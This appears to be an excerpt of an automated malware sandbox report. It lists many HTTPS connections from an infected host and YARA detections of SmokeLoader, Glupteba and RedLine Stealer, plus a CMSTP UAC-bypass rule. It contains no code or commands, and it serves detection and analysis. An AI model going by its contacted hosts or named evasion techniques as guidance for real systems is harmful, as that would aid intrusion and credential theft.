                Source: unknownHTTPS traffic detected: 104.255.105.79:443 -> 192.168.2.6:56401 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:56389 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.40.88:443 -> 192.168.2.6:56563 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:55889 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.124:443 -> 192.168.2.6:56388 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:56001 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:56390 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.25.164.103:443 -> 192.168.2.6:56382 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.7:443 -> 192.168.2.6:56532 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:56380 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:56429 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:56886 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:56393 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.41.20:443 -> 192.168.2.6:56612 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.4.32.216:443 -> 192.168.2.6:56399 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:56424 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 200.108.110.164:443 -> 192.168.2.6:56376 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:55990 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.85.95:443 -> 192.168.2.6:56000 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 186.113.7.204:443 -> 192.168.2.6:56719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.233.131.115:443 -> 192.168.2.6:56004 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.34.34:443 -> 192.168.2.6:56546 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.66.39.205:443 -> 192.168.2.6:56681 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.120.71.24:443 -> 192.168.2.6:55257 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 178.16.128.181:443 -> 192.168.2.6:56717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.6.150:443 -> 192.168.2.6:56547 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.4.32.216:443 -> 192.168.2.6:56425 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.25.164.103:443 -> 192.168.2.6:56383 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.89:443 -> 192.168.2.6:56406 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.22.43.158:443 -> 192.168.2.6:56567 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:56285 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:56002 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 163.247.44.239:443 -> 192.168.2.6:56680 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.43.64:443 -> 192.168.2.6:56400 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.5.25:443 -> 192.168.2.6:56381 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 179.191.175.66:443 -> 192.168.2.6:56565 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:56728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:56342 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.43.64:443 -> 192.168.2.6:56892 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.203.148.34:443 -> 192.168.2.6:55952 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.163.115.86:443 -> 192.168.2.6:56391 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:56561 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.136.69:443 -> 192.168.2.6:56385 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.2:443 -> 192.168.2.6:56107 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.249.120.86:443 -> 192.168.2.6:56386 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.128.15:443 -> 192.168.2.6:56403 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.62.50:443 -> 192.168.2.6:56240 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.43.117:443 -> 192.168.2.6:56421 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.7:443 -> 192.168.2.6:56372 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.158.51.60:443 -> 192.168.2.6:56402 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:56618 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.192.98.160:443 -> 192.168.2.6:55162 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 201.134.41.61:443 -> 192.168.2.6:56008 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:57903 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:56676 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 47.251.24.188:443 -> 192.168.2.6:56374 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.75.198.169:443 -> 192.168.2.6:56568 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.4:443 -> 192.168.2.6:56379 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:56894 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:56426 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:56423 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 47.246.167.169:443 -> 192.168.2.6:56160 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.213.210:443 -> 192.168.2.6:56377 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 177.74.1.157:443 -> 192.168.2.6:56099 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:56562 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.233.198.20:443 -> 192.168.2.6:56636 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.240.114.212:443 -> 192.168.2.6:56682 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 8.45.52.148:443 -> 192.168.2.6:56384 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 202.81.112.32:443 -> 192.168.2.6:55271 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:57839 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.4:443 -> 192.168.2.6:56893 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 202.81.112.32:443 -> 192.168.2.6:56281 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.14.180:443 -> 192.168.2.6:56564 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.163.115.86:443 -> 192.168.2.6:57902 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.170.147:443 -> 192.168.2.6:56145 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:56881 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.233.198.20:443 -> 192.168.2.6:56422 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.8.17:443 -> 192.168.2.6:56540 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.214.175:443 -> 192.168.2.6:56677 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.5.25:443 -> 192.168.2.6:57904 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:56960 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.6.150:443 -> 192.168.2.6:57197 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.192.98.160:443 -> 192.168.2.6:56704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 179.51.70.125:443 -> 192.168.2.6:55250 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:58308 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:58306 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.170.147:443 -> 192.168.2.6:57896 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.168.2.6:56540 -> 104.26.8.17:443 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:57907 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.168.2.6:56719 -> 186.113.7.204:443 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:57933 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.218.172:443 -> 192.168.2.6:57932 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.183.63.241:443 -> 192.168.2.6:58305 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.69:443 -> 192.168.2.6:62804 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.2:443 -> 192.168.2.6:63163 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.5.25:443 -> 192.168.2.6:63175 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.120.71.26:443 -> 192.168.2.6:57899 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.41.153:443 -> 192.168.2.6:63162 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:62978 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.255.105.79:443 -> 192.168.2.6:63125 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.43.117:443 -> 192.168.2.6:63416 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.249.120.4:443 -> 192.168.2.6:63461 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.195.133.145:443 -> 192.168.2.6:63187 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:63394 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.195.133.145:443 -> 192.168.2.6:63158 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.66.39.205:443 -> 192.168.2.6:63171 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 186.113.7.204:443 -> 192.168.2.6:63343 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.4.32.216:443 -> 192.168.2.6:63025 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.69:443 -> 192.168.2.6:63414 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:63449 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:62986 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:62966 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:63161 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.136.2:443 -> 192.168.2.6:63188 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:63124 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.199.96.179:443 -> 192.168.2.6:63406 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:63156 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.40.88:443 -> 192.168.2.6:63154 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.218.172:443 -> 192.168.2.6:63613 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.170.147:443 -> 192.168.2.6:63389 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.199.96.179:443 -> 192.168.2.6:63157 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:63475 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.240.114.212:443 -> 192.168.2.6:63645 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.120.71.26:443 -> 192.168.2.6:64154 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:64098 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.6:63379 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:63497 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.203.148.34:443 -> 192.168.2.6:63120 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:63291 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.14.180:443 -> 192.168.2.6:63132 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:63133 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.4:443 -> 192.168.2.6:63427 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:63476 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.22.74.220:443 -> 192.168.2.6:63479 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:63409 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.32.109:443 -> 192.168.2.6:63138 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:63421 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.136.2:443 -> 192.168.2.6:63392 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.233.198.20:443 -> 192.168.2.6:63155 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 201.134.41.61:443 -> 192.168.2.6:63143 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:63731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.60.0.44:443 -> 192.168.2.6:63857 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:63458 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:63115 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 178.16.128.181:443 -> 192.168.2.6:63618 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:63426 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:63696 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:63116 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.233.131.115:443 -> 192.168.2.6:63487 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 47.251.24.188:443 -> 192.168.2.6:63532 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.60.188:443 -> 192.168.2.6:63415 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:63477 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:63977 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:63695 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 177.74.1.157:443 -> 192.168.2.6:63705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.32.109:443 -> 192.168.2.6:63457 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:63410 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.69:443 -> 192.168.2.6:64608 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.183.63.241:443 -> 192.168.2.6:63976 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:63700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:63933 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:63699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 163.247.44.239:443 -> 192.168.2.6:63758 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:63890 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.128.15:443 -> 192.168.2.6:63978 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:63997 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.213.210:443 -> 192.168.2.6:64053 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 202.81.112.32:443 -> 192.168.2.6:63834 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.168.2.6:63389 -> 172.67.170.147:443 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:65218 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:65376 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:65347 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:65375 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:65348 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.255.105.79:443 -> 192.168.2.6:65345 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:65344 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.183.63.241:443 -> 192.168.2.6:65355 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.233.198.20:443 -> 192.168.2.6:65304 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:65427 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:65532 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:65424 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:49387 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.2:443 -> 192.168.2.6:65449 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.195.133.145:443 -> 192.168.2.6:65420 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:65421 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.60.0.44:443 -> 192.168.2.6:49206 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:65454 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:65455 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.22.74.220:443 -> 192.168.2.6:65482 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:49384 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:65422 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.240.114.212:443 -> 192.168.2.6:65520 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.4:443 -> 192.168.2.6:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.5.25:443 -> 192.168.2.6:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 186.113.7.204:443 -> 192.168.2.6:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:49691 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.195.133.145:443 -> 192.168.2.6:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.199.96.179:443 -> 192.168.2.6:49679 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:50020 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.249.120.4:443 -> 192.168.2.6:50036 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:49690 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.14.180:443 -> 192.168.2.6:49693 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.4.32.216:443 -> 192.168.2.6:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 177.74.1.157:443 -> 192.168.2.6:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.40.88:443 -> 192.168.2.6:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.43.117:443 -> 192.168.2.6:49765 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.120.71.26:443 -> 192.168.2.6:50054 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 178.16.128.181:443 -> 192.168.2.6:50031 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.69:443 -> 192.168.2.6:50055 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:50072 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.199.96.179:443 -> 192.168.2.6:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.60.0.44:443 -> 192.168.2.6:50122 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.195.133.145:443 -> 192.168.2.6:50147 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.170.147:443 -> 192.168.2.6:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.69:443 -> 192.168.2.6:49689 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 202.81.112.32:443 -> 192.168.2.6:49375 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.41.153:443 -> 192.168.2.6:49696 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.2:443 -> 192.168.2.6:50145 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.66.39.205:443 -> 192.168.2.6:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.255.105.79:443 -> 192.168.2.6:50113 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.128.15:443 -> 192.168.2.6:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.203.148.34:443 -> 192.168.2.6:49949 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.22.74.220:443 -> 192.168.2.6:50102 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:49775 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 41.33.126.100:443 -> 192.168.2.6:50126 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:50058 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 41.33.126.100:443 -> 192.168.2.6:50127 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.218.172:443 -> 192.168.2.6:50114 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:50218 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.136.2:443 -> 192.168.2.6:50104 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 201.134.41.61:443 -> 192.168.2.6:50103 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.4:443 -> 192.168.2.6:50502 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:50132 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:50133 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:50511 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.240.114.212:443 -> 192.168.2.6:50390 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:50134 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:50367 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.233.198.20:443 -> 192.168.2.6:50125 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:50460 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.5.25:443 -> 192.168.2.6:50373 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.136.2:443 -> 192.168.2.6:50492 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:50709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.6:50146 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.199.96.179:443 -> 192.168.2.6:50665 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:50354 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:50708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:50236 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 186.113.7.204:443 -> 192.168.2.6:50666 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2135985424.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2411281547.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2414876922.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

                E-Banking Fraud

                barindex
                Yara detected Glupteba
                Source: Yara matchFile source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.2f50e67.11.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000001E.00000002.2687018524.0000000003393000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.2677016530.0000000000843000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 16.2.93B.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 10.2.93B.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 27.0.356F.exe.fe0000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
                Source: 00000006.00000002.2412727821.00000000005E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.2135985424.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000002B.00000002.2972702045.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000006.00000002.2411281547.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.2136667464.00000000005D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
